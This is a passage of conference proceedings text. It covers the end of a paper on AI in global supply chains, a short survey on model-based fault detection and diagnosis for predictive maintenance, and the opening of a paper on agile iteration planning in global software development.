After implementing the automated system in one of the leading companies of the food industry (based in Morocco), the results were as follows (Table 1):

Artificial Intelligence Applications in the Global Supply Chain

291

Table 1. Gains after implementing the proposed solution Warehousing

Delay in procurement

Delay in dispatch

Committed Errors

Before implementing the solution

3–4 h

1–2 h

60%

After implementing the automated system

35–40 min

15–25 min

10% (because of network issues)

Inventory Management (%) 80%

100%

3.4 Artificial Intelligence and Distribution Genetic Algorithms are a type of AI approach that has been properly used to a number of difficult supply chain network design issues. Vehicle routing and scheduling are two of these problems [31, 32]. The vehicle routing problem (VRP) is the task of determining a set of low-cost vehicle routes that start from a local warehouse, reach a database of predetermined clients, and back to the distribution center without violating any constraints [33]. According to a show-floor discussion at MODEX 2018, robotics can offer a method to turn conventional equipment into self-driving vehicles. Logistics organizations rely on physical and increasingly era of digitization that does indeed work in harmony while dealing with large volumes, poor profits, lean asset allocation, and time constraints. AI allows logistics organizations to optimize network coordination to levels of success that are impossible to attain with human thinking only. AI can assist the supply chain operations in redefining current habits and processes, such as moving activities from reactive to proactive, scheduling from forecast to prediction, processes from manual to automated, and services from standardized to personalized [34]. Moreover, nowadays, there has been a greater significant focus on customer experience, which entails developing richer, more personalized, and more convenient experiences for the customer. Making every user feel special and welcome is a difficult task in modern organizations. This became complex and expensive, and it was often reserved only for the most profitable customers. AI technologies such as machine learning and computer vision have fundamentally transformed it. Also, If an ordinary grocery buyer puts a bundle of bananas in his cart, cameras or sensors may communicate the information to an AI application that already knows what the buyer loves based on previous purchases. The application may then recommend, through a video monitor in the cart, that bananas would be excellent with a salted caramel ice cream, which the shopper’s purchasing history indicates he or she enjoys, and remind the customer of where to acquire the needed components [35]. A runner, for example, could download a free application from an athletic shoe brand that would monitor her workout pattern and offer footwear matched to her routine as well as jogging trails she would enjoy. Amazon has developed a retail facility in Seattle that lets customers to pick up food from the stores and walk out without waiting at the checkout machine to pay [36].

292

I. Lebhar et al.

The Amazon Go store employs computer vision technology to track customers when they swipe in and associate them with goods taken from shelves. The concept is simple: no caisses, nor hosts or hostesses of caisses. It’s as simple as showing the Amazon Go app on his smartphone at the store’s entrance, making his purchases, and exiting as soon as he’s there. The cameras, which are dispersed throughout the area, monitor the client’s movements and detect the products caught in the rays. When a customer leaves the store, the bill is automatically sent to the application based on the items in his bag. The payment is made through the Amazon account [36]. Amazon is now regularly collecting data from drones during home deliveries in order to better target future purchases. AI is giving the appropriate tools for operation management in every area [37].

4 Artificial Intelligence Risks and Challenges In the third chapter “Benefits of AI in Supply chain management”, we looked at the positive effects of AI on supply chain processes (Demand forecast, warehousing, …). But even AI provides benefits to consumers and adds value, it may also have negative effects and sometimes intense repercussions.AI is not a self-contained solution. Companies must control it and provide inputs to ensure smooth operation. Furthermore, it evolves into a complex monitoring system eventually, making it difficult to detect and recognize errors when they appear. Moreover, it is challenging to fully focus on AI. The entire process requires time, domain expertise, and security administrators, which is a significant problem for most businesses especially because it manages sensitive business data. Companies must ensure that the system is secure, otherwise, security incidents may adversely impact supply chain performance [40]. Another important risk area is the interface between humans and robots. Challenges in automated transport, industries, and networks are among the most evident. When an operator of large machinery, trucks, or other equipment, doesn’t notice if the system needs to be stopped or something should be activated because his attention is elsewhere, accidents and failures are potential. With increased automation companies reduced their workforce. Employees who actually hold these roles and rely on their logistics-based positions to improve their lives, support their families, and pay their bills, are the main victims of this improved efficiency [41]. As AI takes over, fewer jobs will be available across the board; the company must somehow develop new roles for their workers or release them entirely. In brief, AI consumes a lot of effort in terms of time and money, raises the unemployment problem, and limits innovation upon developers. Also, the new generation is becoming lazy, and the rate of technological dependency increased.

5 Conclusion This paper has presented the findings of research on the Artificial Intelligence Applications in The Global Supply Chain: Benefits and Challenges and its benefits in the global supply chain, based on different article reviews and case studies combined with

Artificial Intelligence Applications in the Global Supply Chain

293

bibliometric analysis to investigate the current state of research on AI applications in the supply chain. Over the previous few decades, AI has played a significant role in the modern revolution. From demand forecasting and procurement to production, warehousing, and distribution, artificial intelligence techniques increase supply chain management effectiveness. This new technology has advanced due to the impact of recent developments in data processing and high-performance computing, and a plethora of industrial products have been created with intelligent capabilities and complex mechanisms. It is worth noting that the trend in global supply chain operations driven by AI is immensely increasing, implying that AI has already become a priority for several companies all over the world. However, when compared to traditional manufacturing organizations, artificial intelligence transformation is both an opportunity and a challenge. In this intriguing field, our findings are just a starting point for future research such as: – Natural Language Processing (NLP) represents a promising domain that, when combined with other Industrial revolution 4.0 technologies such as IoT and blockchain, has the potential to greatly affect supply chain management practices. – Automated planning and scheduling, which has important applications ranging from managing space vehicles to programming robots, deserves more attention in order to create future opportunities in the industrial sectors. – Blockchain, Big data, and robotics seem to be another key area to investigate, particularly given the crucial role robotics play in many industrial fields. On the other hand, big data will become the potential oil, with data provision companies functioning as utility suppliers (Kaplan and Haenlein, 2019), it has become valuable to evaluate the aspects where big data could indeed add value to Supply Chain. – Because of the optimization technique that could handle an integrated heuristic algorithm, we believe that TS needs extra-scientific attention in future supply chain management analyses. – The implications of machine learning and artificial intelligence on transportation might be addressed, particularly with the emergence of self-driving vehicles and AI powered intelligent road systems.

References 1. Collin, J., et al.: How to design the right supply chains for your customers. Supply Chain Manag. 14, 411–417 (2016) 2. Mentzer, J.T., et al.: Defining supply chain management. J. Bus. Logist. (2001) 3. Ni, D., Xiao, Z., Lim, M.K.: A systematic review of the research trends of machine learning in supply chain management. Int. J. Mach. Learn. Cybern. 11, 1463–1482 (2019). Springer 4. Huang, B., Huan, Y., Xu, L., Zheng, L., Zou, Z.: Automated trading systems statistical and machine learning methods and hardware implementation: a survey. Enterp. Inf. Syst. 13(1), 132–144 (2019)

294

I. Lebhar et al.

5. Huang, C., Cai, H., Xu, L., Xu, B., Gu, Y., Jiang, L.: Data-driven ontology generation and evolution towards intelligent service in manufacturing systems. Future Gener. Comput. Syst. 101, 197–207 (2019) 6. Rajkomar, E., et al.: Scalable and accurate deep learning with electronic health records. NPJ Digit. Med. 1(1), 1–10 (2018) 7. Xu, L., Tan, W., Zhen, H., Shen, W.: An approach to enterprise process dynamic modeling supporting enterprise process evolution. Inf. Syst. Front. 10(5), 611–624 (2008) 8. Shi, Z., et al.: MSMiner—a developing platform for OLAP. Decis. Support Syst. 42(4), 2016–2028 (2007) 9. Zhang, C., Xu, X., Chen, H.: Theoretical foundations and applications of cyberphysical systems. J. Libr. Hi Tech 38(1), 95–104 (2019) 10. Bostrom, N., Yudkowsky, E.: The ethics of artificial intelligence. Cambridge Handb. Artif. Intell. 1, 316–334 (2014) 11. Habimana, O., Li, Y., Li, R., Gu, X., Yu, G.: Sentiment analysis using deep learning approaches: an overview. Sci. China Inf. Sci. 63, 1–36 (2020). Springer 12. Lopes, V., Alexandre, L.A.: An overview of blockchain integration with robotics and artificial intelligence. arXiv preprint arXiv:1810.00329 (2018). arxiv.org 13. Nilsson, N.J.: Principles of Artificial Intelligence. Morgan Kaufmann Publishers Inc., Palo Alto (2014) 14. Erhan, D., Courville, A., Bengio, Y., Vincent, P.: Why does unsupervised pre-training help deep learning?. In: Proceedings of the Thirteenth International Conference on Artificial Intelligence and Statistics. In: JMLR Workshop and Conference Proceedings, pp. 201–208 (2010) 15. Hu, R.Q., Hanzo, L.: Twin-timescale artificial intelligence aided mobility-aware edge caching and computing in vehicular networks. IEEE Trans. Veh. Technol. 68(4), 3086–3099 (2019) 16. Chen, X.W., Lin, X.: Big data deep learning: challenges and perspectives. IEEE Access 2, 514–525 (2014) 17. Zhang, C.: Research on the economical influence of the difference of regional logistics developing level in China. J. Industr. Integr. Manag. 05(02), 205–223 (2020) 18. Bughin, J., Hzan, E., Ramaswamy, S., Chui, M., et al.: Artificial Intelligence: The Next Digital Frontier? McKinsey Global Institute, Washington, DC (2017) 19. Burgess, A.: AI in action. In: The Executive Guide to Artificial Intelligence. Palgrave Macmillan, Cham (2018) 20. Kusiak, A.: Smart manufacturing, Int. J. Prod. Res. 56, 508–517 (2018) 21. Martin, C., Leurent, H.: Technology and innovation for the future of production: accelerating value creation. WEF (2017) 22. Webster, C., Ivanov, S.H.: Robotics, artificial intelligence, and the evolving nature of work. In: George, B., Paul, J. (eds.) Business Transformation in Data Driven Societies. PalgraveMacMillan, London (2019, Forthcoming) 23. Prihatno, A.T., Nurcahyanto, H., Jang, Y.M.: Artificial intelligence platform based for smart factory. In: 1st Korea Artificial Intelligence Conference (2020) 24. Artificial intelligence in industry: intelligent production. https://new.siemens.com/global/en/ company/stories/industry/ai-in-industries.html 25. O’Reilly, C., Binns, A.J.M.: The three stages of disruptive innovation: idea generation, incubation, and scaling. Calif. Manag. Rev. 61, 49–71 (2019) 26. Ehiorobo, O.A.: Strategic agility and ai-enabled resource capabilities for business survival in post-covid-19 global economy. Int. J. Inf. Bus. Manag. 12, 201–213 (2020) 27. Klumpp, M.: Automation and artificial intelligence in business logistics systems: human reactions and collaboration requirements. Int. J. Logist. Res. Appl. 21(3), 224–242 (2018)

Artificial Intelligence Applications in the Global Supply Chain

295

28. Abdul-Rahman, et al.: [16] the author s an “Internet of things application using tethered msp430 to thinkspeak cloud” for the constant monitoring of the data and the information’s gathered in the real time 29. Silver, D., et al.: Mastering the game of Go with deep neural networks and tree search. Nature 529(7587), 484 (2016) 30. Dorigo, M., Birattari, M.: Ant Colony Optimization. Springer, Boston (2010). https://doi.org/ 10.1007/978-0-387-30164-8_22 31. Malmborg, C.: A genetic algorithm for service level based vehicle scheduling. Eur. J. Oper. Res. 93, 121–134 (1996) 32. Park, Y.B.: A hybrid genetic algorithm for the vehicle scheduling problem with due times and time deadlines. Int. J. Prod. Econ. 73(2), 175–188 (2001) 33. Christo des, N.: Vehicle routing. In: Lawler, E., Lenstra, J., Rin, A., Kannooy, S.D. (eds.) The Traveling Salesman Problem, pp. 431–448. Wiley, Hoboken (1964) 34. Gesing, B., Peterson, S.J., Michelsen, D.: Artificial Intelligence In Logistics. A collaborative report by DHL and IBM on implications and use cases for the logistics industry (2018). https://www.logistics.dhl/content/dam/dhl/global/core/documents/pdf/glo-artificialintelligence-in-logisticstrend-report.pdf. Accessed 14 Nov 2018 35. Mortimer, G., Milford, M.: When AI meets your shopping experience it knows what you buy – and what you ought to buy. The Conversation, 31 August 2018 36. Metz, R.: Amazon’s cashier-less Seattle grocery store is opening to the public. MIT Technical review (2018). Mnih, V., Kavukcuoglu, K., Silver, D., Rusu, A.A., et al.: Human level control through deep reinforcement learning. Nature 518(7540), 529–33 (2015) 37. Druehl, C., Carrillo, J., Hsuan, J.: Technological innovations: impacts on supply chains. In: Moreira, A., Ferreira, L., Zimmermann, R. (eds.) Innovation and Supply Chain Management. CMS, pp. 259–281. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-74304-2_12 38. Walker. J.: Machine Learning in Manufacturing: Present and Future Use Cases (2018). https:// www.techemergence.com/machine-learning-in-manufacturing/. Accessed 13 Nov 2018 39. Kaplan, A., Haenlein, M.: Business Horizons. Elsevier, Amsterdam (2019) 40. Moore, P.V.: OSH and the future of work: benefits and risks of artificial intelligence tools in workplaces. In: International Conference on Human-Computer Interaction (2019) 41. Mar, W., Thaw, Y.: An analysis of benefits and risks of artificial intelligence. Int. J. Trend Sci. Res. Dev. 3, 2456–6470 (2019) 42. Russell, S., Dewey, D., Tegmark, M.: Research priorities for robust and beneficial artificial intelligence. AI Mag. (2015). ojs.aaai.org 43. Baryannis, G., Dani, S., Validi, S., Antoniou, G.: Decision support systems and artificial intelligence in supply chain risk management. In: Zsidisin, G.A., Henke, M. (eds.) Revisiting Supply Chain Risk. SSSCM, vol. 7, pp. 53–71. Springer, Cham (2019). https://doi.org/10. 1007/978-3-030-03813-7_4 44. Modgil, S., Singh, R.K., Hannibal, C.: Artificial intelligence for supply chain resilience: learning from COVID-19. Int. J. Logist. Manag. 33, 1246–1268 (2021). ISSN 0957-4093 (2021)

Fault Detection and Diagnosis in Condition-Based Predictive Maintenance Oumaima El Hairech(B) and Abdelouahid Lyhyaoui LTI Laboratory, ENSA of Tangier, Abdelmalek Essadi University, Tangier, Morocco [email protected], [email protected]

Abstract. The maintenance of tools, equipment and machines is, today more than ever, at the heart of process optimization that will support market developments while maintaining efficiency and an optimal productivity rate. An accurate and timely maintenance plan will reduce unplanned downtimes, improve machine availability, and reduce the risk of non-compliance. Predictive maintenance (PdM), supported by digital technologies, will allow companies to predict future breakdowns and take early action to prevent them, and this will have a major impact on increasing the availability rate of machines and creating a more secure link with production, while reducing unplanned costs. Fault detection and diagnosis (FDD) lies at the core of PdM with the primary focus on finding anomalies in the working equipment at early stages and alerting the manufacturing supervisor to carry out maintenance activity. The aim of this paper is to highlight fault detection as a component of predictive maintenance and describe the model-based approach of machine fault diagnosis. Keywords: Predictive maintenance · Machine learning (ML) · Fault detection · Fault diagnosis · Fault prognosis · Condition monitoring · ML approach · ML algorithm · Industry 4.0 · Root cause analysis (RCA)

1 Introduction Recent years have seen an advanced approach to maintenance which is particularly attractive in the industry 4.0 environment and significantly improves the efficiency of modern production facilities. Before, maintenance could be divided into two categories: on the one hand we have corrective maintenance which only allows intervention after the failure or breakdown of an equipment or a production line, which can cause harmful financial losses for the company because of all the unplanned downtimes that result, it is also called proactive maintenance [1]. On the other hand we have preventive maintenance, or in other words proactive maintenance, which allows intervention before the occurrence of a breakdown [2], and which can itself be divided into two categories: Predetermined maintenance which is mainly based on the history of the equipment or machine lifetime to set up an intervention schedule before failure, unlike condition-based maintenance which is based on the permanent supervision of the machine to define a planning of maintenance activities. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 296–301, 2023. https://doi.org/10.1007/978-3-031-35251-5_28

Fault Detection and Diagnosis in Condition-Based Predictive Maintenance

297

Although condition-based maintenance is based on sensors, it can simply describe the current state of the machine without being able to estimate potential changes in state [5]. Predictive maintenance is an enhancement to this condition-based strategy. It allows to use the data resulting from the automated monitoring to make an intelligent prognosis that make it possible to detect the warning signs of the failure and to predict the time remaining before failure. [6]. This maintenance policy involves several important improvements in the manufacturing and maintenance process that can significantly reduce production costs [7]. Anomaly detection is a very important component of predictive maintenance, it is mainly based on the detection of outliers based on techniques that identify a deviating behavior from normal operation. It important that manufacturing processes, which generate a large volume of data, be monitored in real time to generate timely anomaly alerts. [7]. The rest of this article will be organized as follows: in the first section we will briefly define the terminologies related to process monitoring, the concept of condition-based monitoring, as well as fault detection diagnosis and fault prognosis. In the second section we will describe the model-based approach of fault diagnosis. And in the last section we will provide a conclusion and future works.

2 Terminology and Concepts Before talking about monitoring, it’s important to clearly define terminologies used in this area. In this section we will first clarify the difference between fault, failure, and malfunction since they are the basic and most used terms in condition monitoring. Then we will pinpoint the link between condition-based monitoring strategy and predictive maintenance. 2.1 Fault, Failure, and Malfunction A fault can be defined as an outlawed deviation of at least one feature property of the system from the acceptable, usual, standard condition. [8, 9]. The fault may already exist in the process or may appear at any time, the speed of appearance of faults may also vary [10]. There are many different types of faults: design fault, manufacturing fault, assembling fault normal operation fault, maintenance fault, operator’s fault. When these faults are directly caused by humans, they can be called also errors. Frequently, faults are difficult to detect, especially, if they are small or hidden [7]. A fault or multiple faults may initiate a failure or a malfunction: A failure is defined as an eternal system interruption to execute a demanded function or a Permanent interruption of a system’s ability to perform a required function under specified operating conditions. By predictability, we can distinguish between different types of failures: Random or unpredictable failure, it’s statistically independent from operation time or other failures, Deterministic failure which is predictable for certain conditions, Systematic or casual failure, which is dependent on known conditions [8]. A malfunction is a temporary incapability of a system to fulfill its desired function. Usually, a failure and a malfunction occur after beginning of operation or after stressing the system [9].

298

O. E. Hairech and A. Lyhyaoui

2.2 Predictive Maintenance and Condition Monitoring Predictive maintenance brings a new dimension to maintenance strategies, thus maximizing lifetime machines and minimizing unplanned downtimes. It is mainly based on signs coming from the machine such as unusual noises and vibrations, intensive etc. [11]. Among these signs, there are those which are detectable by the operators and others which cannot be observed by the human being because they evolve slowly and therefore cannot be identified on a day-to-day basis. It is for this reason that manufacturers set up monitoring systems using a variety of sensors and different techniques to collect machine system data and parameters, store them and do in-depth analysis by the following [12]. It is in this logic that predictive maintenance is considered as an upgrade of the condition-based strategy. It goes beyond automated machine condition monitoring; but extends to computerized evaluation of input data and enables intelligent prognostics to detect failure triggers and predict how long it will take. Remains before failure are likely to occur [13]. Most anomalies do not occur instantaneously but constantly change from normality to abnormality, so it is necessary to rely on the prediction of degradation using tools that allow observation in permanently and detect deviations from the Average performance of the machine and thus ensure proper monitoring and degradation. This presupposes that there is current information about an item’s condition, as well as historical data about normal and abnormal operating behavior [13]. 2.3 Fault Detection, Diagnosis, and Prognosis A good approach to predictive maintenance does not stop at predicting the time remaining before failure occurs, but also relies on the monitoring data collected to determine the root cause of the failure. [14, 15] Anomaly detection can therefore be considered a critical component of PdM. In general, it is defined as a process that makes it possible to determine or detect faults in a system [17], in other words, it makes it possible to differentiate abnormal behavior from normal behavior of a machine [16]. To have an accurate detection approach, it is necessary to monitor the machine components separately, which makes it easier to identify the root causes of a new fault [15]. Fault diagnosis is a process that includes fault detection, isolation, identification, classification, and evaluation of faults [17]. It consists of locating the root causes of failures to reduce financial losses and improve process safety [16]. Prognosis, on the other hand, is the process of predicting future failures of a system by making an in-depth analysis of the history of the operating conditions of the system as well as monitoring the deviations of operation in comparison with the normal condition [17].

3 Machine Fault Diagnosis In the literature, several approaches are cited for the management of fault detection and diagnosis problems, these approaches can be categorized into two main classes, namely the model-based approach [18], and the data-driven approach [19]. The first is based on knowledge inferred from models developed based on fundamental understanding of

Fault Detection and Diagnosis in Condition-Based Predictive Maintenance

299

the physics of a system, while the second is based on the transformation of a significant amount of historical data to build a diagnostic system. The model-based method can itself be classified under two categories [20] Quantitative and qualitative models. Quantitative models link the inputs and outputs of a system with mathematical functional relationships, while qualitative models create this link using qualitative functions centered on different units of the system. 3.1 Model-Based Approach Usually fault diagnosis includes fault detection, isolation, identification, classification, and evaluation steps, but sometimes the combination of fault isolation and fault identification FDI is called a fault diagnosis step [9]. Model based FDI is based on methods that extract features from measured signals as well as process information based on mathematical models. A process model is used to detect the difference between the actual measurements and their estimates, which makes it possible to generate residual signals on which variable or fixed thresholds can be applied to be able to detect defects. Several residues can be designed, each having a sensitivity to a particular fault produced in a particular place of the system. When the threshold set for a residue is exceeded, an analysis is carried out to switch to fault isolation. Figure 1 shows a block diagram of the FDI system based on a model, this diagram is widely accepted by the fault diagnosis community and can be found in several literatures which deal with this subject [21].

Fig. 1. Logical block diagram of model-based fault diagnosis

The structure contains two main stages, residual generation and Residual evaluation that we can describe as follow: Residual generation: On this block the inputs and outputs of the system are used to generate residual signals. The objective is to detect the occurrence of a defect. The residual symptom is zero or close to zero when there is no fault detected, and clearly different from zero otherwise. This means that under ideal conditions, the residual is typically independent of process inputs and outputs [21, 22].

300

O. E. Hairech and A. Lyhyaoui

Residual evaluation: On this second block, it is a question of examining the residuals to study the probability of the occurrence of the defect and the application of the decision rules to know if the defect is produced. Several methods are used for this evaluation, among others, there are geometric methods which make it possible to carry out a threshold test on the values instantly raised or the moving averages of the residuals. There are also statistical methods such as generalized likelihood ratio tests [22]. Model-based techniques rely on an accurate dynamic model of the system and can detect even unforeseen faults [21].

4 Conclusion and Future Research In this paper we presented the first part of a predictive maintenance components survey. We started by defining the terminology and concepts related to Predictive maintenance and condition monitoring. In this first section we stated by defining the basic terms; fault, failure, and malfunction; and the difference between each one of them, then we highlighted the upgrade from condition monitoring strategy to the concept of predictive maintenance and last we clarified each concept of fault detection, diagnosis, and fault prognosis. In the second section we introduced the most cited approaches for anomaly detection problems in the literature, mainly the condition-based approach and data driven approach, and we detailed the first one based on a logical block diagram that illustrate the two main stages of the process: Residual generation and Residual evaluation. In the future work, we foresee to describe the data driven approach of fault diagnosis and the techniques used for fault prognosis that attempts to predict a prospective failure of a machine or component.

References 1. Mobley, R.K.: An Introduction to Predictive Maintenance. Elsevier Science, Amsterdam (2002) 2. Schmidt, B., Wang, L.: Cloud-enhanced predictive maintenance. Int. J. Adv. Manuf. Technol. 99(1–4), 5–13 (2018). https://doi.org/10.1007/s00170-016-8988 3. Grall, L.D., Berenguer, C., Roussignol, M.: Continuous time predictive-maintenance scheduling for a deteriorating system. IEEE Trans. Reliab. 51(2), 141–150 (2002). arXiv:1011. 1669v3, https://doi.org/10.1109/TR.2002.1011518 4. Zhou, L.X., Lee, J.: Reliability-centered predictive maintenance scheduling for a continuously monitored system subject to degradation. Reliab. Eng. Syst. Saf. 92(4), 530–534 (2007). https://doi.org/10.1016/j.ress.2006.01.006 5. Krupitzer, C., et al.: A survey on predictive maintenance for industry 4.0 (2020). arXiv:2002. 08224, http://arxiv.org/abs/2002.08224 6. Gebraeel, N.Z., Lawley, M.A., Li, R., Ryan, J.K.: Residual-life distributions from component degradation signals: a Bayesian approach. IIE Trans. (Inst. Industr. Eng.) 37(6), 543–557 (2005). arXiv:1011.1669v3, https://doi.org/10.1080/07408170590929018 7. Kamat, P., Sugandhi, R.: Anomaly detection for predictive maintenance in industry 4.0 - a survey. In: E3S Web of Conferences 170, 0. EVF’2019 (2020) 8. Hwang, I., Kim, Y., Seah, C.E.: A survey of fault detection, isolation and reconfiguration methods. IEEE Trans. Control Syst. Technol. 18, 636–653 (2010)

Fault Detection and Diagnosis in Condition-Based Predictive Maintenance

301

9. Iserman, R.: Fault-Diagnosis Systems: An Introduction from Fault Detection to Fault Tolerance, 1st edn. Springer, London (2006). https://doi.org/10.1007/3-540-30368-5 10. Iserman, R.: Process fault detection based on modeling and estimation methods- a survey. Automatica 20, 387–404 (1984) 11. ISO 13379-1:2012, Condition monitoring and diagnosis of machines—data interpretation and diagnosis techniques—Part 1: General guidelines (2012) 12. Krenek, J., Kuca, K., Blazek, P., Krejcar, O., Jun, D.: Application of artificial neural networks in condition based predictive maintenance. In: Król, D., Madeyski, L., Nguyen, N.T. (eds.) Recent Developments in Intelligent Information and Database Systems. SCI, vol. 642, pp. 75– 86. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-31277-4_7 13. Anh, D.T., D˛abrowski, K., Skrzypek, K.: The predictive maintenance concept in the maintenance department of the “Industry 4.0” production enterprise. Found. Manag. 10 (2018). ISSN 2080-7279, https://doi.org/10.2478/fman-2018-0022 14. Yam, R.C., Tse, P.W., Li, L., Tu, P.: Intelligent predictive decision support system for condition-based maintenance. Int. J. Adv. Manuf. Technol. 17(5), 383–391 (2001). https:// doi.org/10.1007/s001700170173 15. De Faria, H., Costa, J.G.S., Olivas, J.L.M.: A review of monitoring methods for predictive maintenance of electric power transformers based on dissolved gas analysis. Renew. Sustain. Energy Rev. 46, 201–209 (2015). https://doi.org/10.1016/j.rser.2015.02.052 16. Park, Y.-J., Fan, S.-K., Hs, C.-Y.: A review on fault detection and process diagnostics in industrial processes. Processes 8, 1123 (2020). https://doi.org/10.3390/pr8091123 17. Amini, N., Zhu, Q.: Fault detection and diagnosis with a novel source-aware autoencoder and deep residual neural network (2021). Elsevier B.V 18. Venkatasubrsmanian, V.: Towards integrated process supervision: current status and future directions. In: Proceedings of the IFAC International Conference on Computer Software Structures, Sweden, pp. 1–13 (1944) 19. Luo, M., et al.: Model-based fault diagnosis/prognosis for wheeled mobile robots: a review. 0-7803-9252-3/05/$20.00 ©2005. IEEE (2005) 20. Venkatasubramanian, V., Rengaswamy, R., Yin, K., Kavuri, S.N.: A review of process fault detection and diagnosis part I: quantitative model-based methods. J. Comput. Chem. Eng. 27, 293–311 (2003) 21. Simani, S., et al.: Model-Based Fault Diagnosis in Dynamic Systems Using Identification Techniques. Springer, London (2003). https://doi.org/10.1007/978-1-4471-3829-7 22. Vachtsevanos, G., Lewis, F., Roemer, M., Hess, A., Wu, B.: Intelligent Fault Diagnosis and Prognosis for Engineering Systems. Wiley, Hoboken (2006). ISBN 978-0-471-72999-0

Agile Practices in Iteration Planning Process of Global Software Development Hajar Lamsellak(B) , Amal Khalil , Mohammed Ghaouth Belkasmi , and Mohammed Saber SmartICT Lab, Universit´e Mohammed Premier/Mohammed First University Oujda, ENSA Oujda, 60000 Oujda, Morocco [email protected]

Abstract. Global software development (GSD) term refers to a method of developing software in which stakeholders from many locations and backgrounds participate in the software development life cycle. Software companies use GSD to profit from its many advantages, including cheaper development costs, faster cycle times, accessibility to remote experts, and proximity to the local market. Iterative software development is the goal of the agile software development approach. Customers can add or remove requirements and adjust their priorities after each iteration. This allows them to be a part of the team throughout the project and affords them a lot of flexibility. Therefore to preserve these benefits in the GSD context, the Agile Planning process should consider the many imposed distances, such as geographic, temporal, cultural, language, and organizational ones. This paper focuses on the Iteration Planning level in Agile Global Software Development projects by offering the best agile practices recommended for usage in GSD Iteration Planning based on existing literature.

Keywords: Global software development planning · Agile practices

1

· Agile planning · Iteration

Introduction

The project management literature offers a variety of project types that are based on a comparison of two primary variables: the number of companies participating in their implementation and the number of locations involved in their development [1]. When the majority of the team members work for the same company and in the same location, the project is classified as traditional. When team members from several places collaborate on a project, it is referred to as a distributed project. When people from various countries collaborate on a project, it is called an international project and when team members involve from dispersed geographically and working in different organizations, it is called a virtual project [1]. The global project is a new category that combines virtual and international projects by including people from different organizations and c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 302–309, 2023. https://doi.org/10.1007/978-3-031-35251-5_29

Iteration Planning Process of Global Software Development

303

working in various countries across the globe [1]. Members of a global project’s team come from a variety of cultures, organizations, and time zones; they are physically distributed across countries and speak multiple native languages [1]. These five dimensions of a Global Project can help determine the team’s success, the quality of the project deliverables, and the project’s complexity. While presenting project managers and team members with new difficulties [1]. Global projects enable the unification of highly expert team members dealing with the same project without necessitating relocation teams to other countries, leading to minimizing their costs [3]. The prospect of a larger customer base, cost reduction, productivity improvement are the advantages of globalization that organizations benefit from. On the other hand, with the advancements in technology organizations becomes able to change their operating models as well as how and where they source customers, capital, resources, human capital and how organizations develop software giving rise to the concept of Global Software Development (GSD) [5]. GSD is a new trend originated in the early years of this millennium. It is a way of producing software, where stakeholders from remote locations and possibly different backgrounds are involved in the software development lifecycle to develop commercially viable software for a company [2]. GSD has grown from a newly adopted practice to a widely recognized and accepted approach to software development [13]. GSD team consists of distributed members working across geographic, temporal, cultural, political, and organizational boundaries while collaborating on a common software project to accomplish an interdependent task [12]. Software companies adopt global software development to benefit from decreased cost, reduced cycle time, accessibility to remote experts, and proximity to the local market. However, due to GSD distances, these benefits cannot be achieved and severely affect the communication, coordination, and collaboration processes [17]. Consequently, GSD practitioners face multiple challenges during different phases of software development. The low frequency of communication between remote counterparts, delayed feedback, slow resolution of impediments, decreased visibility of project activities, unawareness regarding remote members, and knowledge management difficulties are some of these challenges that are barriers for GSD projects to attain the intended goals and be terminated before the deadline [17]. To solve GSD challenges and gain the competitive edge provided by agile methods, practitioners have started applying agile methods in GSD. Agile methods provide high flexibility, increased productivity, fast development, decrease defect rates, promise to handle requirements changes throughout the development lifecycle, promote extensive collaboration between customers and developers, ample customer satisfaction, and enhance communication and collaboration [9,17]. Agile approaches are thought to be able to alleviate some of the issues of GSD by enhancing communication, coordination, and collaboration, as a result of the aforesaid benefits. However, because these methodologies were designed for collocated development, they must be adjusted for use in GSD [9,17]. Agile adoption is commonplace, and working in a distributed environ-

304

H. Lamsellak et al.

ment is not an impediment to using agile approaches, according to [11]. Change, according to Agile Planning, is predictable. An iteration’s scope is the only thing that is fixed. After each cycle, the customer can add or delete requirements, as well as adjust their priority. This gives consumers a lot of flexibility and lets them feel like they’re part of the team throughout the process [10]. Pre-planning, Release Planning, and Iteration Planning are the three primary parts of the agile Planning process. Each phase involves specific actions that must be completed in order to accomplish the planning. However, when it comes to Global Software Development projects, the Agile Planning approach must take into consideration the GSD’s different distances: geographical, temporal, cultural, linguistic, and organizational. As a result, the majority of the actions that make up the various phases connected to collocated development should be changed and supplemented by supporting practices to ensure the project’s success. The first level of Agile planning, focusing on the pre-planning phase, was emphasized in our earlier study [6], which described its application inside an Agile Global Software Development project. This article focuses on the Iteration Planning level in Agile Global Software Development projects by offering the best agile methods offered and recommended for usage in GSD Iteration Planning based on existing literature. It’s organized so well: The background and related work are discussed in Sect. 2. Section 3 summarizes and discusses the findings. Finally, Sect. 4 brings the paper to a close.

2 2.1

Background and Related Work Challenges of Global Software Development Projects

The software development team faces a number of difficulties managing GSD because of its organizational and technological complexity [8]. Particularly, challenges that aren’t present in the development of traditional systems are brought on by temporal, geographic, and sociocultural distances [8]. GSD practitioners face several challenges during different phases of software development such as low frequency of communication between remote counterparts, delayed feedback, knowledge management difficulties, reduced cohesiveness of the team, insufficient shared understanding among distributed team members, and unawareness of monitoring of progress [17]. Agile software development methodologies were initially designed for small projects with co-located team members since co-location allows face-to-face team collaboration and quick software releases [4]. This has advantages including delivering business value more frequently than traditional software development techniques, allowing for more quick changes to the program being built, and increasing the rate of correcting software faults [4]. Given these strengths, agile was applied to more complex software projects, particularly ones in which teams are dispersed across several locations [4]. Adopting agile for distributed software development has been linked to advantages including follow-the-sun development, which boosts overall project productivity, cost savings from shifting work to countries with cheaper labor costs, and having access to a larger talent pool [4].

Iteration Planning Process of Global Software Development

305

Our previous work [6] highlighted the first level of Agile planning focusing on the pre-planning phase by describing its application within an Agile Global Software Development projects. Project Planning process is composed of three phases: pre-planning, Release planning, and iteration planning. Through these phases, it highlights project vision, cost, and time of completion. It determines the different resources involved in it. Also, it identifies the dependencies between activities to enable project managers to minimize the idle time and optimize the schedule [10]. This paper focuses on the Iteration Planning level in Agile Global Software Development projects by presenting, based on the existed literature, the best agile practices proposed and recommended to be applied within GSD Iteration Planning. 2.2

Iteration Planning in Software Development Project

